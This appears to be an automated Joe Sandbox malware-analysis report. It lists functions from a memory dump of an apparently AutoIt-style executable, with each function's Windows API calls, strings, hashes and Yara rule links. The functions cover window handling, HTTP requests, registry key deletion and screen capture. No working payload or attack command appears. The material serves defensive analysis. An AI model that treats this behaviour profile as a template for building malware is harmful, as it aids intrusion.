Function 00835A1B Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 00835A2E
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00835A40
SetWindowTextW.USER32(?,?), ref: 00835A57
GetDlgItem.USER32(?,000003EA), ref: 00835A6C
SetWindowTextW.USER32(00000000,?), ref: 00835A72
GetDlgItem.USER32(?,000003E9), ref: 00835A82
SetWindowTextW.USER32(00000000,?), ref: 00835A88
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00835AA9
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00835AC3
GetWindowRect.USER32(?,?), ref: 00835ACC
_wcslen.LIBCMT ref: 00835B33
SetWindowTextW.USER32(?,?), ref: 00835B6F
GetDesktopWindow.USER32 ref: 00835B75
GetWindowRect.USER32(00000000), ref: 00835B7C
MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00835BD3
GetClientRect.USER32(?,?), ref: 00835BE0
PostMessageW.USER32(?,00000005,00000000,?), ref: 00835C05
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00835C2F

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
String ID:
API String ID: 895679908-0
Opcode ID: 7624c16edd979d52aa82f215657f50de3983f6b032c588052599d0009c079d9e
Instruction ID: 2d58bcd1a8e176633596ccdde4f8abc4bd98d323ebda294beb1151081116e5b0
Opcode Fuzzy Hash: 7624c16edd979d52aa82f215657f50de3983f6b032c588052599d0009c079d9e
Instruction Fuzzy Hash: 49715E31900B09AFDB20DFA8CE85A6EBBF5FF88715F104918E582E25A0D775E944CB50

Function 007F00C6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON

Download Yara Rule

APIs

__scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 007F00C6

Part of subcall function 007F00ED: InitializeCriticalSectionAndSpinCount.KERNEL32(008A070C,00000FA0,495E3681,?,?,?,?,008123B3,000000FF), ref: 007F011C
Part of subcall function 007F00ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,008123B3,000000FF), ref: 007F0127
Part of subcall function 007F00ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,008123B3,000000FF), ref: 007F0138
Part of subcall function 007F00ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 007F014E
Part of subcall function 007F00ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 007F015C
Part of subcall function 007F00ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 007F016A
Part of subcall function 007F00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 007F0195
Part of subcall function 007F00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 007F01A0

___scrt_fastfail.LIBCMT ref: 007F00E7

Part of subcall function 007F00A3: __onexit.LIBCMT ref: 007F00A9

Strings

api-ms-win-core-synch-l1-2-0.dll, xrefs: 007F0122
WakeAllConditionVariable, xrefs: 007F0162
kernel32.dll, xrefs: 007F0133
SleepConditionVariableCS, xrefs: 007F0154
InitializeConditionVariable, xrefs: 007F0148

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 66158676-1714406822
Opcode ID: c6eb68f0f2eff608ca48afe24724c1629cc4e96d261943a6d8ec49e930a97057
Instruction ID: 6303c909ffef6788940f6b54cb48eb3dec738857836528f8a84504fbc325bee7
Opcode Fuzzy Hash: c6eb68f0f2eff608ca48afe24724c1629cc4e96d261943a6d8ec49e930a97057
Instruction Fuzzy Hash: 9121F932645719ABE7106BA4AC09B7E37D4FB06B51F01013AFA11E3793DFBCA8008AD0

Function 008330F7 Relevance: 24.9, APIs: 8, Strings: 6, Instructions: 400COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0083318D
_wcslen.LIBCMT ref: 008331F8

Strings

CLASSNN, xrefs: 008331F3, 00833204
NAME, xrefs: 00833335, 00833346
CLASS, xrefs: 00833188, 008331A5
TEXT, xrefs: 0083347C
REGEXPCLASS, xrefs: 00833255, 00833266
INSTANCE, xrefs: 00833453

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: _wcslen
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 176396367-1603158881
Opcode ID: 2bfca5d3d9f5924261bb713e801e7817dcc6688e5f1ded78e9a3e43ff203a61f
Instruction ID: 3f069a8fdb580bebec28862ccb1483c59c9de6f67c5c618e4f7b46a174bf9dfb
Opcode Fuzzy Hash: 2bfca5d3d9f5924261bb713e801e7817dcc6688e5f1ded78e9a3e43ff203a61f
Instruction Fuzzy Hash: 10E1C232A0051AEBCF159FA8C4556FEBBB0FF94710F54811AE556E7240DB34AE8987D0

Function 008444C0 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(00000000,00000000,0086CC08), ref: 00844527
_wcslen.LIBCMT ref: 0084453B
_wcslen.LIBCMT ref: 00844599
_wcslen.LIBCMT ref: 008445F4
_wcslen.LIBCMT ref: 0084463F
_wcslen.LIBCMT ref: 008446A7

Part of subcall function 007EF9F2: _wcslen.LIBCMT ref: 007EF9FD

GetDriveTypeW.KERNEL32(?,00896BF0,00000061), ref: 00844743

Strings

removable, xrefs: 008445EA, 008445EF
unknown, xrefs: 00844708
network, xrefs: 0084469D, 008446A2
ramdisk, xrefs: 008446F1
fixed, xrefs: 00844635, 0084463A
cdrom, xrefs: 0084458F, 00844594
all, xrefs: 00844531, 00844536

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: _wcslen$BuffCharDriveLowerType
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2055661098-1000479233
Opcode ID: be9dbd97a2d6ec53784ffefe5e32de578bcb7a054eb0d5caa85cae5246c3be60
Instruction ID: 8c8aea98fc1a022da58dd5bdf0b6691cec616b6ebb431e81d7a29d07f1fd13b9
Opcode Fuzzy Hash: be9dbd97a2d6ec53784ffefe5e32de578bcb7a054eb0d5caa85cae5246c3be60
Instruction Fuzzy Hash: AEB12F3160830A9FC710EF28C890A7AB7E4FFA5724F51591DF596C7292E734D845CBA2

Function 007D326F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(008A1990), ref: 00812F8D
GetMenuItemCount.USER32(008A1990), ref: 0081303D
GetCursorPos.USER32(?), ref: 00813081
SetForegroundWindow.USER32(00000000), ref: 0081308A
TrackPopupMenuEx.USER32(008A1990,00000000,?,00000000,00000000,00000000), ref: 0081309D
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 008130A9

Strings

0, xrefs: 007D327D

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
String ID: 0
API String ID: 36266755-4108050209
Opcode ID: 7b365f77cbbd7bb799595796bc075b220325d58d8c731bf857fdd3ca289ada83
Instruction ID: ed4a0b916b919ea08b27dd5c151211d9fd3c817012c63dc7d721bf4b5f8550f6
Opcode Fuzzy Hash: 7b365f77cbbd7bb799595796bc075b220325d58d8c731bf857fdd3ca289ada83
Instruction Fuzzy Hash: AF710970640205BEEB319F25CC49FEABF78FF05324F204216F515A62E1CBB5A960C791

Function 00866CD9 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,?), ref: 00866DEB

Part of subcall function 007D6B57: _wcslen.LIBCMT ref: 007D6B6A

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00866E5F
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00866E81
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00866E94
DestroyWindow.USER32(?), ref: 00866EB5
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,007D0000,00000000), ref: 00866EE4
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00866EFD
GetDesktopWindow.USER32 ref: 00866F16
GetWindowRect.USER32(00000000), ref: 00866F1D
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00866F35
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00866F4D

Part of subcall function 007E9944: GetWindowLongW.USER32(?,000000EB), ref: 007E9952

Strings

tooltips_class32, xrefs: 00866E58, 00866EDD
0, xrefs: 00866D98

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
String ID: 0$tooltips_class32
API String ID: 2429346358-3619404913
Opcode ID: f6e27176ed34654eb3c0e8a6abcb2e9c8686e778ece401ffa1bfd66a3be37a2d
Instruction ID: b5c528f150ecfb227b7a8b46f79af5711c3675e08edde79e3c26513029dc0d6e
Opcode Fuzzy Hash: f6e27176ed34654eb3c0e8a6abcb2e9c8686e778ece401ffa1bfd66a3be37a2d
Instruction Fuzzy Hash: 4C718770104284AFEB21CF18DC48ABABBE9FB99304F59041EF999C7260DB75A925CB11

Function 0086911E Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 007E9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 007E9BB2

DragQueryPoint.SHELL32(?,?), ref: 00869147

Part of subcall function 00867674: ClientToScreen.USER32(?,?), ref: 0086769A
Part of subcall function 00867674: GetWindowRect.USER32(?,?), ref: 00867710
Part of subcall function 00867674: PtInRect.USER32(?,?,00868B89), ref: 00867720

SendMessageW.USER32(?,000000B0,?,?), ref: 008691B0
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 008691BB
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 008691DE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 00869225
SendMessageW.USER32(?,000000B0,?,?), ref: 0086923E
SendMessageW.USER32(?,000000B1,?,?), ref: 00869255
SendMessageW.USER32(?,000000B1,?,?), ref: 00869277
DragFinish.SHELL32(?), ref: 0086927E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00869371

Strings

@GUI_DRAGFILE, xrefs: 00869320
@GUI_DROPID, xrefs: 0086929E
@GUI_DRAGID, xrefs: 008692E9

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 221274066-3440237614
Opcode ID: 17df6bbccad29d11e37ae3660af4d36e99ef4cf6afb2ca06388fee49bf159687
Instruction ID: 47a3d88768edbb277b049bf12262ee936309eaf0adba2d4f54ea4eebdff827bd
Opcode Fuzzy Hash: 17df6bbccad29d11e37ae3660af4d36e99ef4cf6afb2ca06388fee49bf159687
Instruction Fuzzy Hash: 45614971108301AFD701DF64DC89DABBBF8FB89750F00091EF6A5922A1DB749A49CB52

Function 0084C476 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0084C4B0
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0084C4C3
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0084C4D7
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0084C4F0
InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0084C533
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0084C549
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0084C554
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0084C584
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0084C5DC
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0084C5F0
InternetCloseHandle.WININET(00000000), ref: 0084C5FB

Strings

, xrefs: 0084C575

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
String ID:
API String ID: 3800310941-3916222277
Opcode ID: 7c7974b4fd9aac7c6b8930ea445c1f2271698e2cc9bf523e7a422c7deab44a21
Instruction ID: 87c155f5047aa058fed3e16aea6b86c3315bc707ec2626cb70ff30f288a46dd4
Opcode Fuzzy Hash: 7c7974b4fd9aac7c6b8930ea445c1f2271698e2cc9bf523e7a422c7deab44a21
Instruction Fuzzy Hash: 01516CB0501208BFDB619FA5C988ABB7BFCFF08754F01851AF985D6210EB74E944DB60

Function 0086856F Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 00868592
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 008685A2
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 008685AD
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 008685BA
GlobalLock.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 008685C8
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 008685D7
GlobalUnlock.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 008685E0
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 008685E7
CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 008685F8
OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,0086FC38,?), ref: 00868611
GlobalFree.KERNEL32(00000000), ref: 00868621
GetObjectW.GDI32(?,00000018,?), ref: 00868641
CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00868671
DeleteObject.GDI32(?), ref: 00868699
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 008686AF

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 1f4cde0ca7867511182f2dbb8825c3d09636034977d6e094a01a874213776753
Instruction ID: 8c0ee03b729cd119e666b5452f9cf51484597667cb4de168864900bc147bd730
Opcode Fuzzy Hash: 1f4cde0ca7867511182f2dbb8825c3d09636034977d6e094a01a874213776753
Instruction Fuzzy Hash: 0D412875600208EFDB119FA5DC4CEAA7BB8FF99B11F124159F95AEB260DB709901CB20

Function 008414BD Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 360timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 00841502
VariantCopy.OLEAUT32(?,?), ref: 0084150B
VariantClear.OLEAUT32(?), ref: 00841517
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 008415FB
VarR8FromDec.OLEAUT32(?,?), ref: 00841657
VariantInit.OLEAUT32(?), ref: 00841708
SysFreeString.OLEAUT32(?), ref: 0084178C
VariantClear.OLEAUT32(?), ref: 008417D8
VariantClear.OLEAUT32(?), ref: 008417E7
VariantInit.OLEAUT32(00000000), ref: 00841823

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 00841625
Default, xrefs: 008416AF

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 1234038744-3931177956
Opcode ID: 9b68ab470357832e392c65e36a37c829e6eb923344f839efbf85e18f5fa78b8b
Instruction ID: 242e56ca8debf9b197f6f140f768304596f6c0449338067d0e8bd013189e54fe
Opcode Fuzzy Hash: 9b68ab470357832e392c65e36a37c829e6eb923344f839efbf85e18f5fa78b8b
Instruction Fuzzy Hash: 8BD1BD31A0021DEBDF10AF65D88DAB9BBB5FF48704F158056E446EB680DB38E881DB61

Function 0085B60E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 007D9CB3: _wcslen.LIBCMT ref: 007D9CBD

Part of subcall function 0085C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0085B6AE,?,?), ref: 0085C9B5
Part of subcall function 0085C998: _wcslen.LIBCMT ref: 0085C9F1
Part of subcall function 0085C998: _wcslen.LIBCMT ref: 0085CA68
Part of subcall function 0085C998: _wcslen.LIBCMT ref: 0085CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0085B6F4
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0085B772
RegDeleteValueW.ADVAPI32(?,?), ref: 0085B80A
RegCloseKey.ADVAPI32(?), ref: 0085B87E
RegCloseKey.ADVAPI32(?), ref: 0085B89C
LoadLibraryA.KERNEL32(advapi32.dll), ref: 0085B8F2
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0085B904
RegDeleteKeyW.ADVAPI32(?,?), ref: 0085B922
FreeLibrary.KERNEL32(00000000), ref: 0085B983
RegCloseKey.ADVAPI32(00000000), ref: 0085B994

Strings

advapi32.dll, xrefs: 0085B8ED
RegDeleteKeyExW, xrefs: 0085B8FE

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 146587525-4033151799
Opcode ID: 24285daee3d56f1c4385fb99c761a7c44962b1af0fc3cf2c738d4f514915fecb
Instruction ID: d85137b645c670c0b38d93e1ee4ff839a7c1c1b203ec9e2f03703b195c24bfd6
Opcode Fuzzy Hash: 24285daee3d56f1c4385fb99c761a7c44962b1af0fc3cf2c738d4f514915fecb
Instruction Fuzzy Hash: C5C17B31204201EFD714DF14C495B2ABBE5FF94309F18859DE99A8B3A2CB75EC49CB92

Function 0085255C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 008525D8
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 008525E8
CreateCompatibleDC.GDI32(?), ref: 008525F4
SelectObject.GDI32(00000000,?), ref: 00852601
StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 0085266D
GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 008526AC
GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 008526D0
SelectObject.GDI32(?,?), ref: 008526D8
DeleteObject.GDI32(?), ref: 008526E1
DeleteDC.GDI32(?), ref: 008526E8
ReleaseDC.USER32(00000000,?), ref: 008526F3

Strings

(, xrefs: 0085268D

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: fc06c4b02ac5da3999efebaa32e6b28ad32232f2f29d85aa549397a628fc6c89
Instruction ID: 6c4240b24282d9c3df2f951e5b05fa6b295e9fec621c426edc9043eee227a37a
Opcode Fuzzy Hash: fc06c4b02ac5da3999efebaa32e6b28ad32232f2f29d85aa549397a628fc6c89
Instruction Fuzzy Hash: 2861C275D00219EFCF04CFA8D885AAEBBF5FF58310F20852AE955A7250E774A951CF90

Function 0080DA5D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0080DAA1

Part of subcall function 0080D63C: _free.LIBCMT ref: 0080D659
Part of subcall function 0080D63C: _free.LIBCMT ref: 0080D66B
Part of subcall function 0080D63C: _free.LIBCMT ref: 0080D67D
Part of subcall function 0080D63C: _free.LIBCMT ref: 0080D68F
Part of subcall function 0080D63C: _free.LIBCMT ref: 0080D6A1
Part of subcall function 0080D63C: _free.LIBCMT ref: 0080D6B3
Part of subcall function 0080D63C: _free.LIBCMT ref: 0080D6C5
Part of subcall function 0080D63C: _free.LIBCMT ref: 0080D6D7
Part of subcall function 0080D63C: _free.LIBCMT ref: 0080D6E9
Part of subcall function 0080D63C: _free.LIBCMT ref: 0080D6FB
Part of subcall function 0080D63C: _free.LIBCMT ref: 0080D70D
Part of subcall function 0080D63C: _free.LIBCMT ref: 0080D71F
Part of subcall function 0080D63C: _free.LIBCMT ref: 0080D731

